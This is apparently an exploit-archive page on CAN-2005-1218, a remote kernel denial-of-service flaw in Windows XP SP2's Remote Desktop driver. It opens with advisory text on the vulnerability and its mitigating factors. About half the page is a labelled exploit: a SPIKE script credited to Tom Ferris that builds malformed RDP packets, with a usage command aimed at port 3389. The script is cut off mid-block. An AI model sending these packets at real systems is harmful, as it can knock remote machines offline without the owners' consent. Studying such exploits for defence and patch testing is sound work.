A denial of service vulnerability exists that could allow an attacker to send a specially crafted Remote Data Protocol (RDP) message to an affected system. An attacker could cause this system to stop responding.

Mitigating Factors for Remote Desktop Protocol Vulnerability - CAN-2005-1218:
* Firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.

* By default, the Remote Desktop Protocol (RDP) is not enabled on any operating system version. On Windows XP and Windows Server 2003, Remote Assistance can enable RDP. On Windows XP Media Center Edition, RDP is enabled if a Media Center Extender has been installed. For information about Media Center Extenders, visit the following Web site.

On Small Business Server 2000 and on Windows Small Business Server 2003, RDP in enabled by default. However, by default, on Windows Small Business Server 2003 and earlier, the RDP Protocol communication ports are blocked from the Internet. RDP is available only on the local network unless Terminal Services or the Remote Web Workplace features have been enabled by using the Configure E-mail and Internet Connection Wizard (CEICW).

* If Remote Desktop is manually enabled, the following Windows Firewall changes will occur, depending on the operating system version:
* On Windows XP Service Pack 2 systems that have the Windows Firewall enabled, enabling the Remote Desktop feature will automatically enable the Remote Desktop exception in the firewall, with the scope of All computers (including those on the Internet). When you disable Remote Desktop, this firewall exception is automatically disabled.
On Windows XP Service Pack 1, Windows Server 2003, and Windows Server 2003 Service Pack 1, enabling the Remote Desktop Feature does not enable the Remote Desktop exception in the firewall. Enabling Remote Desktop causes a dialog box that indicates that you must manually enable this exception. There is a Remote Desktop entry in the exception in the list of the firewall exceptions that a user would have to manually enable. Disabling Remote Desktop does not change the exception status in the firewall. However, although the system is no longer vulnerable to this issue through Remote Desktop, it could still be vulnerable through Remote Assistance and Terminal Services, where available.


Exploit Code:
// Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
//
// Discovered by:
// Tom Ferris
// tommy[at]security-protocols[dot]com
//
// Tested on:
// Microsoft Windows XP SP2
//
// Usage (SPIKE) : ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
//
// 8/9/2005 Security-Protocols.com
//
// This program is free software; you can redistribute it and/or modify it under
// the terms of the GNU General Public License version 2, 1991 as published by
// the Free Software Foundation.

s_block_start("packet_1");
s_string_variable("03");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D
73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D 0A");
s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
s_string_variable("");
s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
s_string_variable("");
s_block_end("packet_1");

s_block_start("packet_2");
s_int_variable(0x0500,5);
s_block_end("packet_2");

s_block_start("packet_3");
s_binary("000002020000");
s_string_variable("");
s_block_end("packet_3